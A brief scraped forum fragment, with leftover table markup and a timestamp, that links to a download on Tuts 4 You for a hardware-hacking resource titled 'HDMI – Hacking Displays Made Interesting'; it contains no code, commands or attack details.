15:03:37[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3422 Sursa: HDMI – Hacking Displays Made Interesting / Hardware Hacking / Downloads - Tuts 4 You